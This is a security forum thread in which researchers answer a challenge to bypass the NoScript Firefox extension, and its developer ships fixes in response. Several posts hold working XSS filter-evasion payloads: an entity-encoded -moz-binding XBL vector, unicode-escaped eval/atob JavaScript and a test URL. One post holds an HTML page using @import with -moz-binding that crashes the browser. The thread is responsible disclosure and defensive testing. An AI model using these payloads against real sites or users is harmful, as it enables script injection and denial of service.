Ok people here's the challenge...

Execute Javascript whilst a site is untrusted
OR
Create a XSS attempt across sites which isn't caught by noscript
OR
Bypass content protection (Flash, frames etc)
OR
Cause DOS

IMPORTANT RULES UPDATE
----------------------
One week private notice to ma1 before public disclosure is required.

Let the fun begin!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 06/16/2008 09:50AM by Gareth Heyes.

I can't seem to find the sources for the noscript extension - anyone got a url? The website http://noscript.net/ itself does not give any information about "how to contribute" aka "how to white box test for vulnerabilities".

Just open the XPI file with Winzip or another archive manager.

asrail Wrote:
-------------------------------------------------------
> I can't seem to find the sources for the noscript
> extension - anyone got a url?

.mario Wrote:
-------------------------------------------------------
> Just open the XPI file with Winzip or another
> archive manager.

Please always use the development build.
Patches are welcome, too.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

This seems to beat noscript XSS protection filtering:-

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@gareth:
Thanks, malformed entities (no semicolon) are an ugly beast, we're lucky NoScript already forbids cross-site XBL.
A version handling any entity Gecko knows (or believes to know) is right on its way ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

How does it work Gareth? can't seem to get it to work here, a hint would be nice.

@Ronald:
it just gets (loosely) parsed as

<div style="-moz-binding: url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss);"></div>

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 11/25/2007 05:11PM by ma1.

Sorry Ronald I should have explained the vector more.

The reason it probably didn't work is because it's a mozbinding as Giorgio said and also I had to split it onto separate lines for nice display.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

NoScript's standard XBL protection should take care of these attacks even if they evade request filters, but for consistence sake I've just released a development build with improved filters and more flexible XBL settings:

http://noscript.net/getit#devel

Thanks Gareth :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 11/26/2007 04:33PM by ma1.

No probs, just for your reference expression based XSS injection also works on IE7 using entities :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/26/2007 05:41PM by Gareth Heyes.

This beats noscript's XSS protection:-
hxxp://demo.phpids.org/?test=%5Cu9999%3Dalert%0A%5Cu9999(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/19/2007 10:22AM by Gareth Heyes.

@Gareth:
clever, thanks :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@Gareth:
it's fixed in the current beta.
Could you hammer a bit more before I release it in the official channel?
Thanks again :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Yeah sure I'll check it out :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Giorgio

The development version is much better now, good work! :)

I tried loads of stuff but it looks like you've got the unicode vectors covered now, noscript detects these:-

\u50001 \u0073\u0065\u0074ter=alert
\u50001=1

\u5000\u003d\u002fYWxlcnQoMSk=/\u005b\u002d\u0031\u005d\u000a
\u0030\u005b\u0027eva\l'](atob(\u5000))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

another one:
top?a=eval(name):0
http://demo.phpids.org/?test=top?a=eval(name):0

me stupid - sorry. had the option disabled (slaps himself)



Edited 1 time(s). Last edit at 12/20/2007 04:27AM by .mario.

@mario

Seems to be detected by the development version

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth:
Unicode vectors were already screened by stable version if they used the ASCII range (\u0000-\u007f), because that was a blatant obfuscation attempt.
Your vector passed first screening because it used the topmost Unicode set, and still wouldn't have passed the JS detection if it wasn't for an over-optimization of my pre-syntax check stage, whose purpose is avoiding SpiderMonkey hits when a string is "obviously" invalid JS -- but obviously, SpiderMonkey knows better than me ;)

If you can't find anything else, I'm gonna release tomorrow.

Thanks again.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

JAVA PURE EVIL?

http://www.krazl.com

This causes DOS on my computer, I haven't confirmed it on another one yet:-

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Noscript DOS Crash</title>
<style type="text/css">
@import 'data:text/css, * {-moz-binding:url(http://somefile.xml#xss)}';
</style>
</head>

<body>
</body>
</html>

This could be a noscript or FF problem

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Doesn't work here, could be a NoScript issue cause I don't have it.

Yep I've tested it on another machine without noscript and it doesn't crash. I'll try and confirm it with noscript installed on another machine.

Update...

Tested and it appears to be a noscript DOS problem. It closes the browser completely on my test machine :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/02/2008 08:19AM by Gareth Heyes.

Here's the POC remotely hosted:-
http://www.businessinfo.co.uk/labs/fun/noscript_css_crash.php

Confirmed on 2 computers (different platforms)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nice job Gareth, interesting vector btw!

Not NoScript-specific, actually:

http://evil.hackademix.net/pocs/xbldos

A NoScript-specific workaround is on its way, preventing also this bug from being exploited on untrusted sites.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@Ronald

Thanks I was gonna do a blog post on @import but I couldn't be arsed, also I thought it was well known anyways.

@ma1

Cool glad a fix is in the pipeline :)
Nice recursion mod :) works without noscript full DOS hehe

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth,

Yeah I knew about @import, but this snippet was quite cute: data:text/css ^^

NoScript 1.2.3 dev build

v 1.2.3
=====================================================================
+ Improved Injection Checker JSON compatibility, now recursively
checking content of string attributes
x Further JS syntax check optimizations
x Fixed potential XBL-based crash after successful -moz-binding
injection (thanks Gareth Heyes for reporting)
x More discreet XSS notification for subframes

Of course, it also protects against the aforementioned generic scriptless XBL crash.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@Ronald

Yeah it's quite handy, if there was a way to use it inline that would be cool.

@ma1

Cool I'll check out the latest version

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]